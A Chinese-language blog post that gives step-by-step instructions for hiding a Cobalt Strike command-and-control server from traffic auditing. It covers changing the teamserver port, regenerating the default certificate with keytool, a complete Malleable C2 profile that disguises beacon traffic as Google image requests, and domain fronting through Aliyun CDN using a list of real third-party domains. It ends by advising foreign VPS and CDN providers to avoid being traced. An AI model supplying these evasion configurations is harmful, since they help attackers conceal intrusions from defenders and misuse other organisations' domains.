Cobalt Strike 绕过流量审计

gclome

原文链接：Cobalt Strike 绕过流量审计

Cobalt Strike简介
Cobalt Strike is software for Adversary Simulations and Red Team Operations. Cobalt Strike 简称CS， A-team详细介绍使用网址。CS是一款优秀的后渗透工具，可以在获取主机权限后进行长久权限维持，快速进行内网提权，凭据导出等。在后渗透中如果未修改特征，容易被流量审计设备监控，被蓝队溯源。 多人运动来不来？

​

去除特征的三种方式
1.修改默认端口
第一种是直接编辑teamserver进行启动项修改。- ./teamserver 1.1.1.1 password 直接修改teamserver vim teamserver

​

第二种是启动的时候指定server_port端口
- java -XXarallelGCThreads=4 -Duser.language=en -Dcobaltstrike.server_port=50505 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024m -classpath ./cobaltstrike.jar server.TeamServer xxx.xxx.xx.xx test google.profile
2.去除证书特征
进入cs目录。

​

查看keytool -list -v -keystore cobaltstrike.store 证书情况，输入默认密码123456回车，可以看到所有者、发布者中Cobalt Strike相关字样。
​
keytool是一个Java 数据证书的管理工具，使用如下：keytool -keystore cobaltstrike.store -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias google.com -dname "CN=(名字与姓氏), OU=(组织单位名称), O=(组织名称), L=(城市或区域名称), ST=(州或省份名称), C=(单位的两字母国家代码)。
example: keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias google.com -dname "CN=US, OU=google.com, O=Sofaware, L=Somewhere, ST=Cyberspace, C=CN"
​
未修改cobaltstrike.store前：

​

修改cobaltstrike.store后，可以看到cobalt strike等关键字样已经去除：

​

google.profile模版可以参考C2.profile和malleable-c2 设置后，可以看到访问/image/后已经返回的是我们设置好的header 了 "Content-Type" "img/jpg"; "Server" "nginx/1.10.3 (Ubuntu)";
​
部分引用源码如下：

1. cs profile
   
2. #   http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/
   
3. #   https://github.com/rsmudge/Malleable-C2-Profiles/
   
4. # Author: @keyi
   
5. #
   
6. 
   
7. set sample_name "google";
   
8. 
   
9. set sleeptime "5000";
   
10. set jitter    "0";
    
11. set maxdns    "255";
    
12. set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
    
13. 
    
14. http-get {
    
15. 
    
16.     set uri "/image/";
    
17. 
    
18.     client {
    
19. 
    
20.         header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
    
21.         header "Referer" "http://www.google.com";
    
22.         header "Pragma" "no-cache";
    
23.         header "Cache-Control" "no-cache";
    
24. 
    
25.         metadata {
    
26.             netbios;
    
27.             append "-.jpg";
    
28.             uri-append;
    
29.         }
    
30.     }
    
31. 
    
32.     server {
    
33. 
    
34.         header "Content-Type" "img/jpg";
    
35.         header "Server" "nginx/1.10.3 (Ubuntu)";
    
36. 
    
37.         output {
    
38.             base64;
    
39.             print;
    
40.         }
    
41.     }
    
42. }
    
43. 
    
44. http-post {
    
45.     set uri "/history/";
    
46. 
    
47.     client {
    
48. 
    
49.         header "Content-Type" "application/octet-stream";
    
50.         header "Referer" "http://www.google.com";
    
51.         header "Pragma" "no-cache";
    
52.         header "Cache-Control" "no-cache";
    
53. 
    
54.         id {
    
55.             netbiosu;
    
56.             append ".asp";
    
57.             uri-append;
    
58.         }
    
59. 
    
60.         output {
    
61.             base64;
    
62.             print;
    
63.         }
    
64.     }
    
65. 
    
66.     server {
    
67. 
    
68.         header "Content-Type" "img/jpg";
    
69.         header "Server" "Microsoft-IIS/6.0";
    
70.         header "X-Powered-By" "ASP.NET";
    
71. 
    
72.         output {
    
73.             base64;
    
74.             print;
    
75.         }
    
76.     }
    
77. }

复制代码

3.修改Cobalt Strike dns_idle

0.0.0.0是Cobalt Strike DNS Beacon特征可设置Malleable C2进行修改 输入set dns_idle "8.8.8.8";

---

域前置原理

域前置（英语：Domain fronting），是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时，域前置使用户能通过HTTP连接到白名单域名（如*.google.cn），无直接与C2服务器的通信。介绍：被攻击机器 -> www.microport.com(走aliyun cdn的域名，根据设定的host头: dns.google.cn找到对应的vps_ip) -> cdn流量转发到vps_ip(c2真实地址)

​

实战配置CDN

购买云服务器，开通CDN服务。加速域名：随便填个高信誉的域名实现域名伪造，例如：oss.microsoft.com，dns.google.com之类的。

登陆aliyun。

​

在IP位置填写cs_teamserver的IP地址。

​

配置c2的Stager的域名为走cdn的地址，如：www.microport.com.cn

​

www.microport.com.cn这种是走aliyun cdn的。其中dns.google.cn是伪造的域名地址，目的是目标机器访问cdn的时候可以根据google.cn特征找到对应的vps_ip。有没人跟我有相同的疑问，这个走aliyun的cdn域名如何获取。这边波师傅给我提供了一些，可能域名作废或者不走cdn了，大家可以根据curl做一下测试。

1. admin.bjexpo.com
   
2. admin.cailianpress.com
   
3. admin.cheyian.com
   
4. admin.cydf.com
   
5. admin.ebp2p.com
   
6. admin.k3.cn
   
7. admin.ks5u.com
   
8. admin.kyjxy.com
   
9. admin.lezi.com
   
10. admin.weiba66.com
    
11. admin.wuzhenfestival.com
    
12. admin.xingfujie.cn
    
13. admin.yxp2p.com
    
14. anxin360.com
    
15. api.3658mall.com
    
16. api.bjexpo.com
    
17. api.cheyian.com
    
18. api.cydf.com
    
19. api.ebp2p.com
    
20. api.ks5u.com
    
21. api.kyjxy.com
    
22. api.lanjinger.com
    
23. api.my089.com
    
24. api.thecover.cn
    
25. api.uiyi.cn
    
26. api.utcard.cn
    
27. api.weiba66.com
    
28. api.wuzhenfestival.com
    
29. api.xingfujie.cn
    
30. api.yxp2p.com
    
31. api.zaozuo.com
    
32. app.bjexpo.com
    
33. app.chanjet.com
    
34. app.cheyian.com
    
35. app.ebp2p.com
    
36. app.eeo.com.cn
    
37. app.gfedu.cn
    
38. app.guojimami.com
    
39. app.hao24.cn
    
40. app.hrmarket.net
    
41. app.k3.cn
    
42. app.kyjxy.com
    
43. app.lanjinger.com
    
44. app.lezi.com
    
45. app.meiduimall.com
    
46. app.sanqin.com
    
47. app.sanqin.com

复制代码

配置成功后，输入 curl -v "www.microport.com/een" -H "Host:dns.google.cn" 可以查看cs的weblog,看见请求/een的日志，证明配置成功。

​

cs生成Windows exe，运行成功上线.可以看到14.17.67.46 东莞IP上线。无直接跟c2连接的域名信息，这样来说蓝队在防守的时候看到的是白名单域名，并且也无法溯源到我们真实的vps地址。​
A-team详细介绍使用网址

1. https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf

复制代码

当然这是bypass流量审计方法、建议使用国外VPS、域名、cdn运营商